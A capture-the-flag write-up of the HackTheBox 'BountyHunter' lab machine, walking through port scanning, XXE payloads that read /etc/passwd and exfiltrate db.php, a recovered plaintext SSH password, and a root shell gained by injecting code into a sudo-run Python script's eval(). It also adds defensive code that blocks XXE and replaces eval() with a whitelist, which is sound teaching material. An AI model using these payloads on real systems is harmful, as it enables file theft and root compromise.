HackTheBox's Machine WriteUp - BountyHunter


Reconnaissance

We use nmap to discover open ports on the target machine:

sudo nmap -sS -sV -T5 -vvv -p- 10.10.11.100

After a few seconds we get the following output.

Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-02 18:34 CET
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 18:34
Scanning 10.10.11.100 [4 ports]
Completed Ping Scan at 18:34, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:34
Completed Parallel DNS resolution of 1 host. at 18:34, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 18:34
Scanning 10.10.11.100 [65535 ports]
Discovered open port 22/tcp on 10.10.11.100
Discovered open port 80/tcp on 10.10.11.100
Completed SYN Stealth Scan at 18:34, 24.81s elapsed (65535 total ports)
Initiating Service scan at 18:34
Scanning 2 services on 10.10.11.100
Completed Service scan at 18:34, 6.09s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.11.100.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 18:34
Completed NSE at 18:34, 0.22s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 18:34
Completed NSE at 18:34, 0.17s elapsed
Nmap scan report for 10.10.11.100
Host is up, received echo-reply ttl 63 (0.044s latency).
Scanned at 2021-11-02 18:34:17 CET for 32s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.77 seconds
           Raw packets sent: 66297 (2.917MB) | Rcvd: 66294 (2.652MB)

Only two services are exposed: SSH on port 22 and an Apache web server on port 80.

Discovery and Scanning

It's time to discover directories and files on the web server. We use gobuster to enumerate the web service.

gobuster dir -u http://10.10.11.100/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 -x php


In the resources directory we find some interesting files:

README.txt

bountylog.js


Exploitation

In bountylog.js we can see that bug reports are submitted as XML to traker_diRbPr00f314.php, which is vulnerable to XXE. The next step is to capture the POST request and modify it with Burp Suite (Repeater).

Now we need a custom XML document to confirm the XXE vulnerability (see: https://github.com/payloadbox/xxe-injection-payload-list).

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY file SYSTEM "file:///etc/passwd" >]>
<bugreport>
	<title>test</title>
	<cwe>test</cwe>
	<cvss>test</cvss>
	<reward>&file;</reward>
</bugreport>

To confirm that the site is vulnerable to XXE, we try to retrieve /etc/passwd with our payload; the file contents come back in the reward field:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
development:x:1000:1000:Development:/home/development:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin

The only regular user on the system is development (UID 1000, login shell /bin/bash). Now let's exfiltrate db.php from the web directory with the following XML; the php://filter wrapper base64-encodes the file so the PHP source is returned intact instead of being executed:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY file SYSTEM "php://filter/convert.base64-encode/resource=./db.php" >]>
<bugreport>
	<title>test</title>
	<cwe>test</cwe>
	<cvss>test</cvss>
	<reward>&file;</reward>
</bugreport>

After decoding the base64 we obtain the database credentials. It is possible that the user reuses the database password for the system account, and indeed we can connect as the development user over SSH with these credentials:

development : m19RoAU0hP41A1sTsq6K
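Both requests above only work because the endpoint's XML parser expands the external entity declared in the DOCTYPE. As an added defensive example (not code from the machine or from this writeup), here is how a bugreport receiver written in Python could refuse such bodies before any parser sees them; the field names come from the XML above, while the function names and sample bodies are constructed.

```python
import re
import xml.etree.ElementTree as ET

# A bugreport never legitimately carries a DTD, so any DOCTYPE or ENTITY
# declaration in the body is refused before a parser sees it.
_DTD_RE = re.compile(rb"<!\s*(DOCTYPE|ENTITY)\b", re.IGNORECASE)
# The four fields used in the bugreport XML; anything else is refused.
_FIELDS = ("title", "cwe", "cvss", "reward")

# Constructed sample bodies: the XXE payload from the writeup and a benign report.
XXE_PAYLOAD = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY file SYSTEM "file:///etc/passwd" >]>
<bugreport><title>test</title><cwe>test</cwe><cvss>test</cvss><reward>&file;</reward></bugreport>"""
BENIGN_REPORT = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<bugreport><title>Broken login</title><cwe>CWE-287</cwe><cvss>7.5</cvss><reward>500</reward></bugreport>"""

def parse_bug_report(raw: bytes) -> dict:
    """Return the report fields, or raise ValueError for anything suspicious."""
    if _DTD_RE.search(raw):
        raise ValueError("DOCTYPE/ENTITY declaration refused (possible XXE)")
    try:
        # stdlib expat does not fetch external entities; the DTD check above
        # keeps even the 'undefined entity' failure mode out of the parser.
        root = ET.fromstring(raw)
    except ET.ParseError as exc:
        raise ValueError(f"malformed XML: {exc}") from exc
    if root.tag != "bugreport":
        raise ValueError(f"unexpected root element <{root.tag}>")
    report = {}
    for child in root:
        if child.tag not in _FIELDS or len(child):
            raise ValueError(f"unexpected element <{child.tag}>")
        report[child.tag] = (child.text or "").strip()
    return report

def rejects(raw: bytes) -> bool:
    """True if parse_bug_report refuses the body."""
    try:
        parse_bug_report(raw)
    except ValueError:
        return True
    return False
```

On the PHP side the equivalent is to never pass LIBXML_NOENT to simplexml_load_string() or DOMDocument::loadXML(), since that flag is what turns on entity substitution.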


Privilege Escalation

In the home directory of development we find the following note:

contract.txt

From the note we can infer that we have sudo permissions for something, so we check with the command sudo -l.

We can execute the **ticketValidator.py** Python script with root permissions.

**ticketValidator.py**

#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.

def load_file(loc):
    if loc.endswith(".md"):
        return open(loc, 'r')
    else:
        print("Wrong file type.")
        exit()

def evaluate(ticketFile):
    #Evaluates a ticket to check for ireggularities.
    code_line = None
    for i,x in enumerate(ticketFile.readlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("# Ticket to "):
                return False
            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
            continue

        if x.startswith("__Ticket Code:__"):
            code_line = i+1
            continue

        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            ticketCode = x.replace("**", "").split("+")[0]
            if int(ticketCode) % 7 == 4:
                validationNumber = eval(x.replace("**", ""))
                if validationNumber > 100:
                    return True
                else:
                    return False
    return False

def main():
    fileName = input("Please enter the path to the ticket file.\n")
    ticket = load_file(fileName)
    #DEBUG print(ticket)
    result = evaluate(ticket)
    if (result):
        print("Valid ticket.")
    else:
        print("Invalid ticket.")
    ticket.close

main()

Line 34 of the script passes the ticket code line straight to eval(), so any Python placed after the arithmetic is executed by the script (code injection, running as root under sudo). Now we need to create a ticket in a .md file to get a root shell.

# Skytrain Inc
# Ticket to BinaryShadow
__Ticket Code:__
**4+10==14 and __import__('os').execl('/bin/bash','bash')

Finally, we run the Python script with sudo and point it at our .md file to obtain a root shell.
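The root cause is that eval() runs whatever follows the arithmetic on the ticket code line. As an added example (not the machine's code or the writeup's), here is the same validator logic with eval() replaced by an AST whitelist that accepts only integer literals, '+' and a single '=='; the function names are assumptions, and the sample tickets in the test are constructed.

```python
import ast

def _ev(node: ast.AST):
    """Whitelist walk: integer literals, '+' and a single '==' only."""
    if isinstance(node, ast.Expression):
        return _ev(node.body)
    if isinstance(node, ast.Constant) and type(node.value) is int:
        return node.value
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        return _ev(node.left) + _ev(node.right)
    if isinstance(node, ast.Compare) and len(node.ops) == 1 and isinstance(node.ops[0], ast.Eq):
        return _ev(node.left) == _ev(node.comparators[0])
    # Names, calls, attribute access and 'and'/'or' all end up here.
    raise ValueError(f"disallowed syntax in ticket code: {type(node).__name__}")

def safe_eval(code: str):
    """Replacement for eval() on the '**...**' ticket line."""
    try:
        return _ev(ast.parse(code, mode="eval"))
    except SyntaxError as exc:
        raise ValueError(f"unparsable ticket code: {exc}") from exc

def rejects_code(code: str) -> bool:
    try:
        safe_eval(code)
    except ValueError:
        return True
    return False

def evaluate_ticket(ticket_text: str) -> bool:
    """Same checks as the original ticketValidator.py, with eval() removed."""
    lines = ticket_text.splitlines()
    if len(lines) < 2 or not lines[0].startswith("# Skytrain Inc") \
            or not lines[1].startswith("# Ticket to "):
        return False
    code_line = None
    for i, x in enumerate(lines[2:], start=2):
        if x.startswith("__Ticket Code:__"):
            code_line = i + 1
        elif code_line is not None and i == code_line:
            if not x.startswith("**"):
                return False
            code = x.replace("**", "")
            ticket_code = code.split("+")[0]
            if not ticket_code.isdigit() or int(ticket_code) % 7 != 4:
                return False
            try:
                return safe_eval(code) > 100   # a bool result counts as 0/1, as before
            except ValueError:
                return False
    return False
```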